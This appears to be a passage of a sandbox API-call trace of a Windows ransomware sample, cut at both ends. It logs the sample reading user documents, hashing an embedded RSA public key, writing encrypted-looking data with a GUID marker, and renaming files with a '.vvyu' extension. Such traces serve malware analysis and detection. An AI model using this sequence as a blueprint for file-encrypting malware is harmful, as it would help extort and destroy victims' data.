| out: hHeap=0x620000) returned 1 [0193.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0c78 | out: hHeap=0x620000) returned 1 [0193.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e90 | out: hHeap=0x620000) returned 1 [0193.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93888 | out: hHeap=0x620000) returned 1 [0193.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937f8 | out: hHeap=0x620000) returned 1 [0193.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937e0 | out: hHeap=0x620000) returned 1 [0193.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e958d8 | out: hHeap=0x620000) returned 1 [0193.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.444] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x11f1f, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x11f1f, lpOverlapped=0x0) returned 1 [0193.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0193.445] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x11f24, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.445] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea0a68 [0193.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea0a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea0e98 [0193.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.447] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea0e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e98 | out: hHeap=0x620000) returned 1 [0193.447] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.447] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.447] CloseHandle (hObject=0x568) returned 1 [0193.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea0a68 [0193.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.450] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\6LeN1-BfLiBS.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\6len1-bflibs.rtf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\6LeN1-BfLiBS.rtf.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\6len1-bflibs.rtf.vvyu")) returned 1 [0193.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.451] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.455] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d5aa80, ftCreationTime.dwHighDateTime=0x1d8228d, ftLastAccessTime.dwLowDateTime=0x60f04020, ftLastAccessTime.dwHighDateTime=0x1d867bc, ftLastWriteTime.dwLowDateTime=0x60f04020, ftLastWriteTime.dwHighDateTime=0x1d867bc, nFileSizeHigh=0x0, nFileSizeLow=0x797, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bMPGAJ9.xlsx", cAlternateFileName="BMPGAJ~1.XLS")) returned 1 [0193.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e958d8 [0193.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0193.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e958d8 | out: hHeap=0x620000) returned 1 [0193.455] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\bMPGAJ9.xlsx") returned=".xlsx" [0193.455] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\bMPGAJ9.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\bmpgaj9.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.456] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=1943) returned 1 [0193.456] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.459] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x771, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.460] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.462] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.462] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x797, lpOverlapped=0x0) returned 1 [0193.462] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.462] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.462] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.462] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.464] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.464] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.464] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.464] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.464] GetLastError () returned 0x0 [0193.464] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.464] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.464] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.464] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.464] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7a0) returned 0x2ea0a68 [0193.465] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e958d8 [0193.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937e0 [0193.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95920 [0193.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937f8 [0193.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93828 [0193.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93888 [0193.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93840 [0193.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.465] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea1210 [0193.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93888 | out: hHeap=0x620000) returned 1 [0193.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1210 | out: hHeap=0x620000) returned 1 [0193.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93888 [0193.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0193.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93840 [0193.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93828 [0193.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0193.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0193.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0193.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0193.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93888 | out: hHeap=0x620000) returned 1 [0193.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.469] GetCurrentThreadId () returned 0x66c [0193.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9f140 [0193.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.469] GetCurrentThreadId () returned 0x66c [0193.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93888 [0193.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93828 [0193.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0193.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93840 [0193.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93810 [0193.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93870 [0193.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0193.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93858 [0193.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643b38 [0193.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x643b20 [0193.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b38 | out: hHeap=0x620000) returned 1 [0193.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x643b38 [0193.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93858 | out: hHeap=0x620000) returned 1 [0193.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0193.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93828 [0193.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 